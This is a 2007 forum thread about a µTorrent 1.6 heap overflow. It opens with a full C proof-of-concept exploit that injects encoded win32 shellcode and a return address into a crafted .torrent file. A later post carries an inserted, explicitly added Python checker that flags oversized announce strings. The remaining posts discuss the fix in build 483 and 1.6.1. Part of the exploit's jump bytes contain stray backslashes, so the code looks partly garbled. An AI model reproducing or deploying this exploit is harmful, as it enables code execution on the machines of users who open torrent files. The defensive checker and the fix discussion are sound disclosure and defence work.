FLX Posted February 13, 2007

```c
/*
 * This is a PoC remote exploit for uTorrent 1.6
 *
 * Author:
 * defsec <defacedsecurity@hotmail.com>
 * http://www.defacedsecurity.com
 *
 * Works on XP SP1 and w2k sp1-4
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* needed for strstr/strcpy/memcpy; missing in the posted copy */

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[] = "\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

// msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\\xa7\x2c\xc2\x77\\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc, char *argv[])
{
    FILE *pFile;
    long lSize;
    char *buffer;
    size_t result;
    long i = 0;
    long j = 0;
    long lPtrIndex;
    long lHeadSize;
    long lTailSize;
    char *curptr;
    char *alptr;
    char *torrentTail;

    if (argc < 2) {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
        printf("\n\nUsage: ");
        printf("%s", argv[0]);
        printf(" <TorrentFile>\n");
        return 0;
    }

    pFile = fopen(argv[1], "rb");
    if (pFile == NULL) {
        fputs("File error", stderr);
        return 0;
    }

    // obtain file size:
    fseek(pFile, 0, SEEK_END);
    lSize = ftell(pFile);
    rewind(pFile);

    // allocate memory to contain the whole file:
    buffer = (char *) malloc(sizeof(char) * lSize);
    if (buffer == NULL) {
        fputs("Memory error", stderr);
        return 0;
    }

    // copy the file into the buffer:
    result = fread(buffer, 1, lSize, pFile);
    if (result != lSize) {
        fputs("Reading error", stderr);
        return 0;
    }
    fclose(pFile);

    /* find announce / announce-list and erase it */
    alptr = (char *) strstr(buffer, "announce");
    if (alptr == NULL) {
        printf("\ninvalid torrent file");
        return 0;
    }
    curptr = (char *) strstr(alptr, "7:comment");
    lHeadSize = curptr - buffer;
    lTailSize = lSize - lHeadSize;
    torrentTail = (char *) malloc(sizeof(char) * lTailSize);
    memcpy(torrentTail, curptr, lTailSize);

    /* generate offending header */
    strcpy(nice_announce, "d8:announce4864:");
    for (lPtrIndex = 16; lPtrIndex <= 4864 + 16; lPtrIndex++)
        nice_announce[lPtrIndex] = 0x90;
    lPtrIndex = 84;
    memcpy(nice_announce + lPtrIndex, xorops, sizeof(xorops) - 1);
    lPtrIndex += sizeof(xorops) - 1;
    memcpy(nice_announce + lPtrIndex, shellcode, sizeof(shellcode) - 1);
    for (lPtrIndex = 4438; lPtrIndex < 4458; lPtrIndex++, i++)
        nice_announce[lPtrIndex] = jmptosc[i];

    /* get head and tail together into a file */
    curptr = (char *) malloc(sizeof(char) * (NASIZE + lTailSize));
    for (i = 0; i < NASIZE; i++)
        curptr[i] = nice_announce[i];
    for (; i < (NASIZE + lTailSize); i++, j++)
        curptr[i] = torrentTail[j];

    /* write to file and exit */
    pFile = fopen("output.torrent", "wb");
    if (pFile == NULL) {
        fputs("File error", stderr);
        return 0;
    }
    fwrite(curptr, sizeof(char), (NASIZE + lTailSize), pFile);
    fclose(pFile);
    return 1337; //:)
}
```

Just a heads up.
Ultima Posted February 13, 2007

Yah, previously reported on the IRC channel ;\

Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files).
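The mechanism described in this thread is a malformed .torrent file, not anything on the network: the posted PoC writes a top-level dictionary whose `announce` string is declared as 4864 bytes, far beyond any tracker URL. A defender who wants to vet files from untrusted sources or RSS feeds before a client autoloads them can bencode-decode them with hard limits and flag that shape. The following is an added example written for this page, not code from the thread, from µTorrent or from BitTorrent Inc.; the length limits, the `TRACKER_URL` pattern and the three sample torrents are constructed assumptions.

```python
"""Defensive .torrent sanity checker (added example; not from the thread or µTorrent).

Decodes a file with hard limits and flags the shape the thread describes: a
top-level dictionary whose "announce" string is far longer than a tracker URL.
"""
import re

# Assumed limits: no tracker URL comes near MAX_ANNOUNCE_LEN, and a generic
# per-string cap keeps a declared length from driving a huge allocation.
MAX_ANNOUNCE_LEN = 1024
MAX_STRING_LEN = 16 * 1024 * 1024
TRACKER_URL = re.compile(rb"^(https?|udp)://[^\s]+$")


class BencodeError(ValueError):
    """Raised for any structural problem in the bencoded input."""


def _decode_at(data, i, max_string_len):
    """Decode one value starting at offset i; return (value, next_offset)."""
    if i >= len(data):
        raise BencodeError("unexpected end of data")
    c = data[i:i + 1]
    if c == b"i":
        end = data.find(b"e", i)
        if end < 0:
            raise BencodeError("unterminated integer")
        try:
            return int(data[i + 1:end]), end + 1
        except ValueError:
            raise BencodeError("malformed integer") from None
    if c == b"l":
        items, i = [], i + 1
        while data[i:i + 1] != b"e":          # runs off the end -> "unexpected end of data"
            value, i = _decode_at(data, i, max_string_len)
            items.append(value)
        return items, i + 1
    if c == b"d":
        result, i = {}, i + 1
        while data[i:i + 1] != b"e":
            key, i = _decode_at(data, i, max_string_len)
            if not isinstance(key, bytes):
                raise BencodeError("dictionary key is not a string")
            value, i = _decode_at(data, i, max_string_len)
            result[key] = value
        return result, i + 1
    if c.isdigit():
        colon = data.find(b":", i)
        if colon < 0 or not data[i:colon].isdigit():
            raise BencodeError("malformed string length")
        length, start = int(data[i:colon]), colon + 1
        if length > max_string_len:
            raise BencodeError(f"string length {length} exceeds cap {max_string_len}")
        if start + length > len(data):
            raise BencodeError(f"declared string length {length} exceeds data")
        return data[start:start + length], start + length
    raise BencodeError(f"unexpected byte {c!r} at offset {i}")


def decode(data, max_string_len=MAX_STRING_LEN):
    """Decode a complete bencoded document, rejecting trailing garbage."""
    value, end = _decode_at(data, 0, max_string_len)
    if end != len(data):
        raise BencodeError("trailing bytes after top-level value")
    return value


def encode(obj):
    """Minimal bencode encoder, used here only to build the sample inputs."""
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(encode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
        return b"d" + b"".join(encode(k) + encode(v) for k, v in sorted(obj.items())) + b"e"
    raise TypeError(f"cannot bencode {type(obj).__name__}")


def check_torrent(data, max_announce_len=MAX_ANNOUNCE_LEN):
    """Return a list of findings; an empty list means the file looks sane."""
    try:
        top = decode(data)
    except BencodeError as exc:
        return [f"malformed bencode: {exc}"]
    if not isinstance(top, dict):
        return ["top-level value is not a dictionary"]
    findings, urls = [], []
    if b"announce" in top:
        urls.append(top[b"announce"])
    for tier in top.get(b"announce-list", []):      # list of tiers, each a list of URLs
        urls.extend(tier if isinstance(tier, list) else [tier])
    for url in urls:
        if not isinstance(url, bytes):
            findings.append("tracker entry is not a string")
        elif len(url) > max_announce_len:
            findings.append(f"announce string of {len(url)} bytes exceeds limit {max_announce_len}")
        elif not TRACKER_URL.match(url):
            findings.append("announce string is not a tracker URL")
    if not isinstance(top.get(b"info"), dict):
        findings.append("missing or non-dictionary info entry")
    return findings


# Constructed samples: a small benign torrent and two malformed variants.
_INFO = {b"name": b"file.bin", b"length": 1024, b"piece length": 16384, b"pieces": b"\x00" * 20}
BENIGN_TORRENT = encode({b"announce": b"http://tracker.example/announce", b"info": _INFO})
# Same shape as the thread's header: "d8:announce4864:" followed by 4864 filler bytes.
OVERSIZED_TORRENT = encode({b"announce": b"A" * 4864, b"info": _INFO})
# Declared string length runs past the end of the data.
TRUNCATED_TORRENT = b"d8:announce4864:abc"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_TORRENT), ("oversized", OVERSIZED_TORRENT),
                         ("truncated", TRUNCATED_TORRENT)):
        print(name, check_torrent(sample) or "ok")
```

Run it on a downloaded file with `check_torrent(open(path, "rb").read())`; anything other than an empty list is a reason to drop the file rather than hand it to the client. The decoder deliberately refuses trailing bytes and mistyped dictionary keys because a lenient parser in the client is exactly what a crafted file relies on.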
Firon Posted February 13, 2007

Does it allow for arbitrary code execution? Does this one work on XP SP2?
Ultima Posted February 13, 2007

"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though.
Greg Hazel Posted February 13, 2007

This is an easy fix. Thanks for the report.
FLX (author) Posted February 13, 2007

I already saw an arbitrary code execution and a local privilege escalation PoC where I'm from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2.
alex14san Posted February 13, 2007

Is it fixed already in the last beta (483)?
Firon Posted February 13, 2007

Yes, ludde fixed it months ago in 483.

http://download.utorrent.com/beta/utorrent-1.6.1-beta-build-483.exe for those who don't have the link.
Falcon4 Posted February 14, 2007

It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?

edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!
Ultima Posted February 14, 2007

Latest Version: µTorrent 1.6.1 Stable build 488
Download: http://download.utorrent.com/1.6.1/utorrent.exe
Changelog: http://download.utorrent.com/1.6.1/utorrent-1.6.1.txt
Falcon4 Posted February 14, 2007

I understand that. This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v
Ultima Posted February 14, 2007

Oh, my post wasn't actually a response so much as it was an update. I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.
Falcon4 Posted February 14, 2007

I see... sorry. But yeah... it's bugged me for a long time that the beta was never added to the download page.
Ultima Posted February 14, 2007

Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.
Firon Posted February 14, 2007

Most betas usually were, but b483 was intended to be with the webui only.
Falcon4 Posted February 14, 2007

I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\

Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*

Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =)
Firon Posted February 14, 2007

1.6.1 already came out; it'll be on the main page later.
Ultima Posted February 14, 2007

I... did... sorta... post... a link... up above
Falcon4 Posted February 14, 2007

Wull yeah but.
xerces8 Posted February 14, 2007

1.6.1 is still not on the download page: http://www.utorrent.com/download.php

There is also not a single word about the exploit on the front page.
Game90 Posted February 14, 2007

Firon said "Later" ....
µtorrent-Guest Posted February 14, 2007

Thank the new guy in charge for that delay!
Bram Cohen
BitTorrent™ Inc.

Edit: I've been talking about the download page since yesterday!
rseiler Posted February 14, 2007

What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?

Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?
Firon Posted February 14, 2007

Beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place.